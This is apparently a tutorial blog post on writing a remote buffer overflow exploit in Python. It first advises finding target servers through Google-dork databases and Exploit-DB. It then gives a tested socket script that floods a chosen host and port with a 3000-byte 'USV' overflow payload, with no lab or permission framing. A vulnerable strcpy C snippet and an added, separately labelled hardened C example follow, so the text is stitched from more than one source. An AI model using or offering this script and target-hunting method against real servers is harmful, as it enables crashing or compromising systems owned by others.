Write A Remote Buffer Overflow Exploit Using Python.


Welcome back guys, today we will learn how to write a remote buffer overflow using the Python programming language, only with TCP.

What you actually need:

- Python 3.4 (or above)

- A stable internet connection

- A vulnerable server

- Computer with Windows or Linux Operating System

If you don't have Python installed on your computer, you can download it from https://www.python.org/downloads/. The installation process is very easy and straightforward.

Writing A Remote Buffer Overflow Exploit Using Python

1. Find a server for testing purposes

This part is a bit complicated. Try searching for dorks at GHDB (https://www.exploit-db.com/google-hacking-database/). You can also try searching for vulnerable software at Exploit-DB (https://www.exploit-db.com).

 

2. Coding

Coding is the fun part. Let us start by importing sys and socket, then write the code below:

 

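import socket
import sys

# Read the target from the command line: -s <host> -p <port>
for carg in sys.argv:
    if carg == "-s":
        argnum = sys.argv.index(carg)
        argnum += 1
        host = sys.argv[argnum]
    elif carg == "-p":
        argnum = sys.argv.index(carg)
        argnum += 1
        port = int(sys.argv[argnum])  # connect() needs an integer port

# 3000 bytes of 0x41 ("A")
buffer = b"\x41" * 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Python 3 sockets send bytes, not str
s.send(b"USV " + buffer + b"\r\n\r")
s.close()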


Now, let's see what the code actually does. We already know the argument identification script. The next part creates a buffer, which is \x41 multiplied 3000 times. Then we can see the lines declaring s as a socket, connecting with it, sending the required buffer and closing the socket. Looks pretty easy, right?


Once we are done with the above steps, let's check the output of our script!


As you can see, the script works fine and I have tested it a couple of times.

How to avoid Remote Buffer Overflow

The solution depends on your programming language. For example, if you are using C, consider code like this:

int authed = 0;
char password_buffer[16];
/* strcpy does not check the length of your_password */
strcpy(password_buffer, your_password);
if (strcmp(password_buffer, password) == 0) {
    authed = 1;
}
else {
    authed = 0;
}

 

So, once your_password is longer than 16 characters, you can get an auth overflow, or, with even more data, a buffer overflow with a segmentation fault error.

There are various solutions for this problem.
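One such solution, shown as an added example (not code from the original post): check the received length against the buffer size before copying, and reject input that does not fit. The function name check_password, its parameters and the sample password are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PASSWORD_BUF_LEN 16   /* same size as password_buffer above */

/*
 * Hypothetical hardened check (names are assumptions, not the post's code).
 * input/input_len are the raw bytes as received from the network; they are
 * not assumed to be NUL-terminated. Returns 1 on match, 0 otherwise.
 */
int check_password(const char *input, size_t input_len, const char *password)
{
    char password_buffer[PASSWORD_BUF_LEN];
    int authed = 0;

    if (input == NULL || password == NULL)
        return 0;

    /* Reject anything that does not fit, leaving room for the terminator.
     * Rejecting (instead of truncating) means a long input that merely
     * starts with the right password is not accepted. */
    if (input_len >= sizeof(password_buffer))
        return 0;

    memcpy(password_buffer, input, input_len);   /* length already checked */
    password_buffer[input_len] = '\0';

    /* Compare lengths too, so an embedded NUL cannot shorten the input. */
    if (strlen(password) == input_len &&
        memcmp(password_buffer, password, input_len) == 0)
        authed = 1;

    return authed;
}

int main(void)
{
    char flood[3000];                      /* constructed sample input */
    memset(flood, 0x41, sizeof(flood));    /* 3000 x 'A', as in the script */

    printf("correct: %d\n", check_password("s3cret", 6, "s3cret"));
    printf("flood:   %d\n", check_password(flood, sizeof(flood), "s3cret"));
    return 0;
}
```

The 3000-byte input is rejected by the length check before any copy takes place, so password_buffer and the variables next to it are never written out of bounds.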
